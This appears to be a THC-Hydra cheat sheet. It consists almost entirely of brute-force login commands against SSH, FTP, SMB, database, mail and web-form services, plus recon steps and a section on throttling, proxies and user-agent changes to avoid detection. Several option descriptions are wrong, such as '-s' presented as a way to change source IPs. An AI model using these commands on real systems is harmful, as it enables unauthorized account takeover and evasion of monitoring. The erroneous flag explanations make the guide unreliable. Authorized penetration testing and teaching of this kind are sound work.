THC-Hydra is a parallelized login cracker that supports numerous protocols for attacking authentication mechanisms.
THC-Hydra is a fast network logon cracker that supports many different services and protocols. Itโs designed to test the security of authentication systems by attempting to crack passwords through brute force and dictionary attacks.
# Hydra comes pre-installed on Kali Linux
hydra --help
sudo apt update
sudo apt install hydra
# Install dependencies
sudo apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev
# Compile from source
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
sudo make install
hydra [options] target service
# SSH brute force with single username
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# FTP brute force with username list
hydra -L userlist.txt -P passlist.txt ftp://192.168.1.100
# HTTP POST form attack
hydra -l admin -P passlist.txt 192.168.1.100 http-post-form "/login:username=^USER^&password=^PASS^:Invalid login"
# Single username and password
hydra -l username -p password target service
# Single username, multiple passwords
hydra -l username -P passwordlist.txt target service
# Multiple usernames, single password
hydra -L userlist.txt -p password target service
# Multiple usernames and passwords
hydra -L userlist.txt -P passwordlist.txt target service
# Username:password combination file
hydra -C combo.txt target service
# Number of parallel connections (default: 16)
hydra -t 32 -L users.txt -P pass.txt target service
# Tasks per connection (default: 64)
hydra -T 4 -L users.txt -P pass.txt target service
# Add wait time between connections (seconds)
hydra -w 3 -L users.txt -P pass.txt target service
# Exit after first valid password found
hydra -f -L users.txt -P pass.txt target service
# Verbose output
hydra -v -l admin -P pass.txt target service
# Very verbose (debug mode)
hydra -V -l admin -P pass.txt target service
# Save output to file
hydra -o results.txt -l admin -P pass.txt target service
# Resume interrupted session
hydra -R
# Basic auth brute force
hydra -L users.txt -P pass.txt target http-get /admin/
# With specific user agent
hydra -L users.txt -P pass.txt -m "Mozilla/5.0..." target http-get /admin/
# Login form attack
hydra -l admin -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login"
# With additional parameters
hydra -l admin -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^&submit=Login:Invalid login"
# HTTPS form attack
hydra -l admin -P pass.txt target https-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login"
# GET-based login
hydra -l admin -P pass.txt target http-get-form "/login.php:username=^USER^&password=^PASS^:Invalid login"
# With cookies
hydra -l admin -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid:H=Cookie: PHPSESSID=abc123"
# With custom headers
hydra -l admin -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid:H=X-Forwarded-For: 127.0.0.1"
# Follow redirects
hydra -l admin -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid:F=302"
# Basic SSH attack
hydra -l root -P pass.txt ssh://192.168.1.100
# SSH with specific port
hydra -l root -P pass.txt ssh://192.168.1.100:2222
# SSH with timeout
hydra -w 5 -l root -P pass.txt ssh://192.168.1.100
# FTP brute force
hydra -L users.txt -P pass.txt ftp://192.168.1.100
# Anonymous FTP check
hydra -l anonymous -p "" ftp://192.168.1.100
# SMB brute force
hydra -L users.txt -P pass.txt smb://192.168.1.100
# NetBIOS attack
hydra -L users.txt -P pass.txt 192.168.1.100 smb
# MySQL brute force
hydra -L users.txt -P pass.txt mysql://192.168.1.100
# PostgreSQL attack
hydra -l postgres -P pass.txt postgres://192.168.1.100
# MSSQL attack
hydra -L users.txt -P pass.txt mssql://192.168.1.100
# SMTP brute force
hydra -L users.txt -P pass.txt smtp://mail.target.com
# POP3 attack
hydra -L users.txt -P pass.txt pop3://mail.target.com
# IMAP attack
hydra -L users.txt -P pass.txt imap://mail.target.com
Create a file with username:password combinations:
# combo.txt format
admin:admin
root:root
user:password123
test:test123
# Use combo file
hydra -C combo.txt target service
# Use password generation module
hydra -l admin -x 4:6:a target service # 4-6 chars, lowercase
hydra -l admin -x 6:8:aA1 target service # 6-8 chars, mixed case + numbers
hydra -l admin -x 8:10:aA1! target service # 8-10 chars, all character sets
# HTTP proxy
export HYDRA_PROXY=http://proxy:8080
hydra -l admin -P pass.txt target service
# SOCKS proxy
export HYDRA_PROXY=socks4://proxy:1080
hydra -l admin -P pass.txt target service
# Hydra automatically saves state to hydra.restore
# Resume interrupted attack
hydra -R
# Resume from specific restore file
hydra -R -o new_results.txt
# Capture login request with Burp Suite first
# POST /login.php HTTP/1.1
# Content-Type: application/x-www-form-urlencoded
# username=admin&password=test&submit=Login
# Convert to Hydra command
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login.php:username=^USER^&password=^PASS^&submit=Login:Invalid username or password"
# Test common credentials
hydra -L common_users.txt -P common_pass.txt ssh://server.company.com
# Test against specific user with time delay
hydra -l serviceaccount -P passwords.txt -w 10 -t 4 ssh://server.company.com
# WordPress admin brute force
hydra -l admin -P pass.txt target.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:ERROR"
# First, discover services with nmap
nmap -sV -p 21,22,23,25,53,80,110,443,993,995 target.com
# Then test discovered services
hydra -L users.txt -P pass.txt ftp://target.com
hydra -L users.txt -P pass.txt ssh://target.com
hydra -L users.txt -P pass.txt smtp://target.com
# Slow down attacks to avoid detection
hydra -w 5 -t 1 -L users.txt -P pass.txt target service
# Random delays
hydra -W 2 -L users.txt -P pass.txt target service
# Use different source IPs (requires multiple network interfaces)
hydra -s 2222 -L users.txt -P pass.txt target service
# For HTTP attacks, vary user agents
hydra -m "Mozilla/5.0 (X11; Linux x86_64)" -L users.txt -P pass.txt target http-post-form
# Password lists
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/fasttrack.txt
/usr/share/wordlists/wfuzz/others/common_pass.txt
# Username lists
/usr/share/wordlists/metasploit/unix_users.txt
/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt
# Common usernames
echo -e "admin\nroot\nuser\ntest\nguest\nadministrator" > users.txt
# Common passwords
echo -e "password\n123456\nadmin\nroot\ntest\nguest" > pass.txt
# Extract from website with CeWL
cewl -w wordlist.txt -d 2 -m 5 http://target.com
# Generate mutations
john --wordlist=base.txt --rules --stdout > mutated.txt
# Start with small, targeted lists
hydra -L top_users.txt -P top_pass.txt target service
# If successful, expand the attack
hydra -L expanded_users.txt -P /usr/share/wordlists/rockyou.txt target service
# Gather information first
nmap -sV target
nikto -h target
whatweb target
# Look for default credentials in application documentation
# Check for account lockout policies
# Identify authentication mechanisms
# Start small and targeted
hydra -l admin -p admin target service
# Common credentials
hydra -C common_creds.txt target service
# Dictionary attack
hydra -L users.txt -P small_pass.txt target service
# Full wordlist (last resort)
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt target service
# Test for lockout policies first
hydra -l testuser -p wrongpass1 -p wrongpass2 -p wrongpass3 -f target service
# If lockout detected, adjust strategy
hydra -w 300 -t 1 -L users.txt -p commonpass target service # 5-minute delays
# Successful login found
[22][ssh] host: 192.168.1.100 login: admin password: password123
# Connection errors
[ERROR] could not connect to target port 22
# Authentication failures
[22][ssh] host: 192.168.1.100 login: admin password: wrong
# Extract successful logins
grep -E "\[.*\]\[.*\].*login:" hydra_output.txt
# Count attempts
grep -c "login:" hydra_output.txt
# Extract unique successful credentials
grep "login:" hydra_output.txt | awk '{print $5 ":" $7}' | sort -u
# Test basic connectivity first
telnet target.com 22
nc -zv target.com 22
# Check for firewalls/rate limiting
nmap -sS -O target.com
# Capture request with Burp Suite or browser dev tools
# Verify form parameters and failure messages
# Check for CSRF tokens or captchas
# Reduce threads if connections fail
hydra -t 4 -L users.txt -P pass.txt target service
# Increase wait time
hydra -w 10 -L users.txt -P pass.txt target service
# Check system resources
top
netstat -an | grep target_ip
man hydra for complete option reference# Web application form attack
hydra -l admin -P pass.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# SSH brute force
hydra -L users.txt -P pass.txt ssh://target.com
# FTP brute force
hydra -L users.txt -P pass.txt ftp://target.com
# MySQL database attack
hydra -l root -P pass.txt mysql://target.com
# SMB/Windows shares
hydra -L users.txt -P pass.txt smb://target.com
# HTTP basic authentication
hydra -L users.txt -P pass.txt target.com http-get /admin/
# SMTP mail server
hydra -L users.txt -P pass.txt smtp://mail.target.com
# Resume interrupted session
hydra -R
# Generate passwords (6-8 chars, alphanumeric)
hydra -l admin -x 6:8:aA1 target.com ssh
Hydra is an extremely powerful tool that can cause account lockouts, service disruption, and legal consequences if misused. Always ensure you have proper authorization before testing any system, and use reasonable limits to avoid damaging target systems.
Master Hydra responsibly and help organizations improve their authentication security through ethical penetration testing.